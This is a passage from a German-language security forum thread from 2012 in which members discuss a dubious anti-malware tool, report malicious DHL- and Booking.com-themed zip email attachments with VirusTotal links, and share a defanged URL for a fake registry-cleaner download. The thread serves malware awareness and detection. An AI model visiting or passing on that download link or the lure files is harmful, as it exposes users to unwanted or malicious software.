Warum AVs das jedoch erkennen sollten weiß ich nicht, es macht für mich nichts erkennbar böses und es werden keine Fake-Alarme ausgegeben (wie bei Roques üblich).
Das die Entfernung kostet ist nicht so ungewöhnlich (tut sie bei HitmanPro ja auch).

Der Beitrag wurde von SLE bearbeitet: 26.03.2012, 09:59


--------------------
Don't believe the hype!
Go to the top of the page
 
+Quote Post
markus17
Beitrag 26.03.2012, 18:05
Beitrag #4353



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 1.891
Mitglied seit: 15.10.2006
Mitglieds-Nr.: 5.448

Betriebssystem:
Win7 Prof x64
Virenscanner:
GDATA IS 20xx
Firewall:
GDATA IS 20xx



Man kann das Programm auch wieder ganz normal deinstallieren. Ich habe allerdings nicht nachgeprüft, ob viel zurückbleibt. 40-50MB für ein reines Fake-AV finde ich aber ziemlich viel. Ich würde es auch mal in die Kategorie "überflüssiges Programm" schieben.


--------------------
thx ;) hostanmullkriag@gmx.de
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 26.03.2012, 19:33
Beitrag #4354



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 10.095
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 8.1 x64 SP1
Virenscanner:
Sandboxie 4.9.3
Firewall:
cFos 9.05



ZITAT(SLE @ 26.03.2012, 10:36) *
Habe es mal schnell getestet...


Klar...schnell...mal eben so... Ich weiß sehr wohl, was mal eben schnell ist wink.gif

Also darf man das Progrämmchen weder als Scareware, noch als Rogueware bezeichnen. Es tut ja was, wenn auch nicht viel. Ist so ein TuneUp der Anti-Malware-Szene biggrin.gif


Edit: Vielleicht sollte man es mal in gelbe Schachteln verpacken, draufschreiben...dass es den PC schneller macht...an Computerbild schicken und Testsieger werden lassen rolleyes.gif

Der Beitrag wurde von Solution-Design bearbeitet: 26.03.2012, 19:35


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
SLE
Beitrag 26.03.2012, 20:00
Beitrag #4355



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 3.650
Mitglied seit: 30.08.2009
Wohnort: Leipzig
Mitglieds-Nr.: 7.705

Betriebssystem:
Win8 Pro (x64)
Virenscanner:
AppGuard + Sandboxie
Firewall:
Win8-FW



ZITAT(Solution-Design @ 26.03.2012, 20:32) *
Klar...schnell...mal eben so... Ich weiß sehr wohl, was mal eben schnell ist wink.gif


Schnell ist doch relativ...
Schau mal auf das 2.Bild, wie lange laut diesem Super-Tool mein Notebook zum booten braucht. In diesem Kontext sind 30min Test sehr schnell. whistling.gif


--------------------
Don't believe the hype!
Go to the top of the page
 
+Quote Post
markus17
Beitrag 11.04.2012, 20:35
Beitrag #4356



Gehört zum Inventar
******

Gruppe: Mitglieder
Beiträge: 1.891
Mitglied seit: 15.10.2006
Mitglieds-Nr.: 5.448

Betriebssystem:
Win7 Prof x64
Virenscanner:
GDATA IS 20xx
Firewall:
GDATA IS 20xx



Gestern bzw. vorgestern per Mail erhalten (auf meine Spam-Adresse):

Mail 1:
DHL-Express-Delivery-Notification-Details_04-2012-CY1CF260.zip
https://www.virustotal.com/file/65919470080...sis/1334171837/
-> Wird von G Data mit Signaturenstand vom 2.4.2012 nicht erkannt. Führt man das Sample aus, meldet sich sofort der BB und löscht alles.

Mail 2:
Reservation-Details-From-Booking-Com_04041257132.zip
https://www.virustotal.com/file/1974326b8a7...sis/1334171955/
-> Wird ebenfalls nicht mit alten Signaturen erkannt, ist jedoch leider in einer VM nicht lauffähig... ich brauche einen physischen Testrechner. xD


--------------------
thx ;) hostanmullkriag@gmx.de
Go to the top of the page
 
+Quote Post
Xeon
Beitrag 15.04.2012, 14:17
Beitrag #4357



Kennt sich hier aus
***

Gruppe: Mitglieder
Beiträge: 279
Mitglied seit: 15.02.2010
Mitglieds-Nr.: 7.945

Betriebssystem:
OS X Mavericks



hxxp://www.registry-scan.org/registrycleanpro/?langcode=de&xat=ggde

Scheint ein Fake Programm (beschleunigen sie ihren PC) zu sein , NOD erkennt es beim herunterladen durch ESET Live Grid als potenzielle unerwünscht Anwendung und blockiert es.
https://www.virustotal.com/file/f579202ae92...sis/1334495189/


Der Beitrag wurde von Xeon bearbeitet: 15.04.2012, 14:58
Go to the top of the page
 
+Quote Post
olli
Beitrag 15.04.2012, 14:33
Beitrag #4358



Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.766
Mitglied seit: 30.11.2003
Wohnort: Dortmund
Mitglieds-Nr.: 242

Betriebssystem:
Windows 8.1 Prof 64Bit
Virenscanner:
Eset /GData /KIS
Firewall:
Router & o.g



Hast du die Datei noch? Würde sie dann mal durch BitDefender jagen wollen...

Bis denen
olli


--------------------
...und sonst bin ich mit einem VW T3 oder einer V-Strom unterwegs...
Go to the top of the page
 
+Quote Post
Solution-Design
Beitrag 15.04.2012, 15:39
Beitrag #4359



Ist unverzichtbar
*******

Gruppe: Mitglieder
Beiträge: 10.095
Mitglied seit: 28.11.2004
Mitglieds-Nr.: 1.621

Betriebssystem:
Windows 8.1 x64 SP1
Virenscanner:
Sandboxie 4.9.3
Firewall:
cFos 9.05



URL aufrufen?


--------------------
Yours sincerely

Uwe Kraatz
Go to the top of the page
 
+Quote Post
olli
Beitrag 15.04.2012, 15:41
Beitrag #4360



Ist unverzichtbar
Gruppensymbol

Gruppe: Freunde
Beiträge: 4.766
Mitglied seit: 30.11.2003
Wohnort: Dortmund
Mitglieds-Nr.: 242

Betriebssystem:
Windows 8.1 Prof 64Bit
Virenscanner:
Eset /GData /KIS
Firewall:
Router & o.g



Bin ich blöd whistling.gif

Bis denne
Olli


--------------------
...und sonst bin ich mit einem VW T3 oder einer V-Strom unterwegs...
Go to the top of the page
 
+Quote Post

228 Seiten V  « < 216 217 218 219 220 > » 
Reply to this topicStart new topic
1 Besucher lesen dieses Thema (Gäste: 1 | Anonyme Besucher: 0)
0 Mitglieder:

 



Vereinfachte Darstellung Aktuelles Datum: 18.04.2014, 19:12
Impressum